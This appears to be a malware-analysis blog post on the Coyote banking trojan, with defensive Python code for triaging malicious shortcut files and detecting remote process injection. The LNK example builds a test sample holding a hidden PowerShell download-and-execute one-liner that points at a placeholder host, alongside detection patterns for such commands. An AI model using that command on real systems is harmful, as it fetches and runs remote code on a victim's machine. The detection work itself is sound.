The Coyote Trojan, also known as the Coyote Banking Trojan, is a type of malware that primarily targets financial institutions and their users. Discovered in early 2024, it has expanded its reach to affect over 1,030 websites and 73 financial institutions.
This Trojan employs a stealthy delivery approach: the lure is an LNK (shortcut) file whose target launches a PowerShell command, and the PowerShell stage fetches what follows. Because the early stages are a shortcut and script text rather than a PE executable, this multi-stage infection chain slips past traditional antivirus products that concentrate on scanning executable files. Once deployed, the Coyote Trojan can perform a range of malicious activities, including keylogging, capturing screenshots, and displaying phishing overlays on top of banking sites to steal credentials.
The Coyote Trojan is notable for its ability to manipulate security objects and inherit permissions, making it a sophisticated and dangerous threat in the cybersecurity landscape.
Infection Chain:

Initial Vector: LNK Files
The infection starts when the victim opens a malicious LNK (shortcut) file. The shortcut's target and argument fields hold a PowerShell command line, so double-clicking it launches PowerShell with attacker-chosen arguments rather than the document the icon suggests.

PowerShell (.PS1) Script:
This PowerShell script connects to an attacker-controlled server and downloads additional malicious scripts. Staging the payload this way lets the attacker keep control over the infection and swap in further payloads without changing the lure.

The downloaded scripts perform several tasks, such as altering system settings, disabling security tools, and setting the stage for the final payload. These actions help the malware avoid detection and establish a persistent presence on the system.
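The chain above (LNK file with a PowerShell target, a stager that downloads the next stage) can be triaged statically before anything runs. The following is an added example, not code from the original write-up or from any Coyote sample: a minimal parser for the Windows Shell Link format (MS-SHLLINK) that reads the header, skips the optional LinkTargetIDList and LinkInfo blocks, extracts the StringData fields, and scores the resulting command line for the traits described in this section. The LNK bytes are constructed inline; the relative path, the host `example.invalid`, the script name `stage2.ps1` and the icon path are placeholders.

```python
"""Static triage of a Windows shortcut (.lnk) whose target is a PowerShell one-liner."""
import re
import struct

# {00021401-0000-0000-C000-000000000046}, the LinkCLSID every Shell Link starts with
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")

# LinkFlags bits (MS-SHLLINK 2.1.1)
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SW_SHOWMINNOACTIVE = 7  # ShowCommand that opens the window minimized, a common lure setting

# StringData fields, in the order the file stores them
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_RELPATH, "relative_path"),
                 (HAS_WORKDIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location"))

# Heuristics applied to "<relative path> <arguments>" in lower case
PATTERNS = (
    (r"powershell(\.exe)?|\bpwsh\b", "invokes PowerShell"),
    (r"(?<![\w-])-(nop|noprofile)\b", "-NoProfile"),
    (r"(?<![\w-])-(w|windowstyle)\s+hidden", "hidden window"),
    (r"(?<![\w-])-(e|ec|enc|encodedcommand)\s", "encoded command"),
    (r"(?<![\w-])-(ep|exec|executionpolicy)\s+bypass", "ExecutionPolicy Bypass"),
    (r"\biex\b|invoke-expression", "Invoke-Expression"),
    (r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient|start-bitstransfer",
     "remote download"),
)


def _read_string(buf, off, unicode):
    """One StringData item: CountCharacters (u16) then the characters, no terminator."""
    (count,) = struct.unpack_from("<H", buf, off)
    off += 2
    if unicode:
        return buf[off:off + 2 * count].decode("utf-16-le"), off + 2 * count
    return buf[off:off + count].decode("cp1252", errors="replace"), off + count


def parse_lnk(buf):
    """Return ShowCommand and the StringData fields of a Shell Link."""
    if len(buf) < 76 or struct.unpack_from("<I", buf, 0)[0] != 0x4C or buf[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link file")
    (flags,) = struct.unpack_from("<I", buf, 20)
    (show_command,) = struct.unpack_from("<I", buf, 60)
    off = 76                                          # fixed-size ShellLinkHeader
    if flags & HAS_IDLIST:                            # IDListSize (u16) + IDList bytes
        off += 2 + struct.unpack_from("<H", buf, off)[0]
    if flags & HAS_LINKINFO:                          # LinkInfoSize (u32) includes itself
        off += struct.unpack_from("<I", buf, off)[0]
    info = {"show_command": show_command}
    for flag, key in STRING_FIELDS:
        if flags & flag:
            info[key], off = _read_string(buf, off, flags & IS_UNICODE)
        else:
            info[key] = ""
    return info


def triage_lnk(buf):
    """Parse and score; returns (fields, list of reasons). An empty list means nothing fired."""
    info = parse_lnk(buf)
    cmd = f"{info['relative_path']} {info['arguments']}".lower()
    reasons = [why for pat, why in PATTERNS if re.search(pat, cmd)]
    if info["show_command"] == SW_SHOWMINNOACTIVE:
        reasons.append("ShowCommand=SW_SHOWMINNOACTIVE")
    if "powershell" in cmd and info["icon_location"] and "powershell" not in info["icon_location"].lower():
        reasons.append("icon disguises target")
    if len(info["arguments"]) > 260:
        reasons.append("oversized argument string")
    return info, reasons


def build_lnk(relative_path, arguments="", icon_location="", show_command=1):
    """Constructed test input: minimal Shell Link with an empty IDList and Unicode StringData."""
    flags, strings = HAS_IDLIST | IS_UNICODE, []
    for flag, value in ((HAS_RELPATH, relative_path), (HAS_ARGS, arguments), (HAS_ICON, icon_location)):
        if value:
            flags |= flag
            strings.append(struct.pack("<H", len(value)) + value.encode("utf-16-le"))
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, show_command, 0, 0, 0, 0)
    return header + struct.pack("<H", 2) + b"\x00\x00" + b"".join(strings)


# Constructed samples; the path, host (example.invalid) and script name are placeholders.
SAMPLE_MALICIOUS = build_lnk(
    r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    "-nop -w hidden -ep bypass -c \"IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/stage2.ps1')\"",
    r"%SystemRoot%\System32\shell32.dll", show_command=SW_SHOWMINNOACTIVE)
SAMPLE_BENIGN = build_lnk(r"..\..\Windows\notepad.exe")

if __name__ == "__main__":
    for label, sample in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        info, reasons = triage_lnk(sample)
        print(label, info["relative_path"], info["arguments"], reasons)
```

Run it against a real shortcut with `triage_lnk(open(path, "rb").read())`. The parser deliberately stops after StringData; the ExtraData blocks that follow (environment, tracker, property store) can carry the real target when the path fields are blank, so a production tool should walk those too. The heuristics are only as good as the argument string, which is why a hidden window plus a minimized ShowCommand and a mismatched icon are scored alongside the download keywords.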
Payload .NET Executable:
The .NET Framework is a software development platform developed by Microsoft, offering a wide range of libraries, tools, and runtime environments for building and running applications. It supports several programming languages, including C#, VB.NET, and F#, and is commonly used for developing Windows desktop applications, web apps, and services. The framework provides key features like memory management, security, and error handling, helping developers create efficient and scalable software.
Windows malware authors also build on the .NET Framework: the runtime ships with every modern Windows release, managed assemblies are straightforward to obfuscate, and they can be loaded reflectively in memory, which is why the final Coyote payload arrives as a .NET executable.
Main Entry Point of the Malware:

VirtualAllocEx:
VirtualAllocEx is a Windows API function that lets one process reserve or commit memory in another process's address space. On its own it does nothing harmful; it is the first step of the classic remote-injection sequence, where malware allocates executable memory in a target process, copies its payload there with WriteProcessMemory, and starts it with CreateRemoteThread or a similar call. Because the payload is executed from memory in a trusted host process and never written to disk as a file, detection is harder for traditional file-scanning antivirus. Debuggers and security products use the same API legitimately, so detection should key on the whole sequence and on the target process, not on the single call.
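Because VirtualAllocEx is only the first call in the sequence, a useful detection correlates it with the write and the thread start that follow, per caller/target process pair. The block below is an added example, not code from the original write-up or from any Coyote sample: it runs over a constructed API-call trace in JSON-lines form (the field names `ts`, `pid`, `image`, `api`, `target_pid`, `size` and `protect` are this example's own, not any EDR vendor's schema, and the process names and PIDs are placeholders). It also catches the variant that allocates read/write memory and flips it to executable with VirtualProtectEx after the write, and it deliberately stays quiet on a debugger that writes non-executable memory into its debuggee.

```python
"""Detect the cross-process injection sequence that starts with VirtualAllocEx."""
import json
from collections import defaultdict

EXEC_PROTECT = {0x10, 0x20, 0x40, 0x80}  # PAGE_EXECUTE, _READ, _READWRITE, _WRITECOPY
THREAD_START_APIS = {"CreateRemoteThread", "CreateRemoteThreadEx", "NtCreateThreadEx",
                     "RtlCreateUserThread", "QueueUserAPC", "SetThreadContext"}

# Constructed trace (JSON lines). Field names are this example's own, not a vendor schema;
# pids and image names are placeholders. "protect" is the hex flProtect / flNewProtect value.
SAMPLE_TRACE = """\
{"ts": 1, "pid": 4120, "image": "payload.exe", "api": "OpenProcess", "target_pid": 2216}
{"ts": 2, "pid": 4120, "image": "payload.exe", "api": "VirtualAllocEx", "target_pid": 2216, "size": 4096, "protect": "0x40"}
{"ts": 3, "pid": 4120, "image": "payload.exe", "api": "WriteProcessMemory", "target_pid": 2216, "size": 3584}
{"ts": 4, "pid": 4120, "image": "payload.exe", "api": "CreateRemoteThread", "target_pid": 2216}
{"ts": 5, "pid": 900, "image": "svchost.exe", "api": "VirtualAllocEx", "target_pid": 900, "size": 65536, "protect": "0x04"}
{"ts": 6, "pid": 900, "image": "svchost.exe", "api": "WriteProcessMemory", "target_pid": 900, "size": 65536}
{"ts": 7, "pid": 3300, "image": "debugger.exe", "api": "VirtualAllocEx", "target_pid": 3301, "size": 4096, "protect": "0x04"}
{"ts": 8, "pid": 3300, "image": "debugger.exe", "api": "WriteProcessMemory", "target_pid": 3301, "size": 100}
{"ts": 9, "pid": 5100, "image": "loader.exe", "api": "VirtualAllocEx", "target_pid": 5200, "size": 8192, "protect": "0x04"}
{"ts": 10, "pid": 5100, "image": "loader.exe", "api": "WriteProcessMemory", "target_pid": 5200, "size": 8192}
{"ts": 11, "pid": 5100, "image": "loader.exe", "api": "VirtualProtectEx", "target_pid": 5200, "protect": "0x20"}
{"ts": 12, "pid": 5100, "image": "loader.exe", "api": "NtCreateThreadEx", "target_pid": 5200}
{"ts": 13, "pid": 7000, "image": "scanner.exe", "api": "VirtualAllocEx", "target_pid": 7100, "size": 4096, "protect": "0x40"}
"""


def detect_remote_injection(trace_text):
    """Correlate allocate -> write -> thread-start per (caller, image, target) pair.

    Severity: high = all three stages with executable memory, medium = executable
    allocation plus write but no thread start seen, low = executable allocation only.
    """
    pairs = defaultdict(lambda: {"alloc": False, "exec": False, "wrote": False,
                                 "thread": False, "ts": []})
    for line in trace_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        src, dst = ev["pid"], ev.get("target_pid", ev["pid"])
        if src == dst:
            continue                      # in-process allocations are routine (JITs, allocators)
        st = pairs[(src, ev["image"], dst)]
        api = ev["api"]
        protect = int(ev.get("protect", "0x0"), 16)
        if api == "VirtualAllocEx":
            st["alloc"] = True
            st["exec"] = st["exec"] or protect in EXEC_PROTECT
        elif api == "VirtualProtectEx":  # RW-then-RX variant: permission flip after the write
            st["exec"] = st["exec"] or protect in EXEC_PROTECT
        elif api == "WriteProcessMemory" and st["alloc"]:
            st["wrote"] = True
        elif api in THREAD_START_APIS and st["wrote"]:
            st["thread"] = True
        st["ts"].append(ev["ts"])

    alerts = []
    for (src, image, dst), st in pairs.items():
        if not (st["alloc"] and st["exec"]):
            continue                      # non-executable remote memory alone is not injection
        severity = "high" if st["wrote"] and st["thread"] else "medium" if st["wrote"] else "low"
        alerts.append({"severity": severity, "source_pid": src, "source_image": image,
                       "target_pid": dst, "first_ts": min(st["ts"]), "last_ts": max(st["ts"])})
    alerts.sort(key=lambda a: ("high", "medium", "low").index(a["severity"]))
    return alerts


if __name__ == "__main__":
    for alert in detect_remote_injection(SAMPLE_TRACE):
        print(alert)
```

The ordering checks matter: a write only counts after an allocation in the same target, and a thread start only after a write, so an unrelated CreateRemoteThread does not promote a pair on its own. In a real deployment the low-severity hits (an executable allocation with nothing after it) are where allow-listing of known tooling goes; the high-severity pair, a foreign process receiving executable memory, a copy and a new thread, is the pattern described above.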

Indicators of Compromise (IOCs):
MITRE ATT&CK MATRIX:
Happy Hunting !!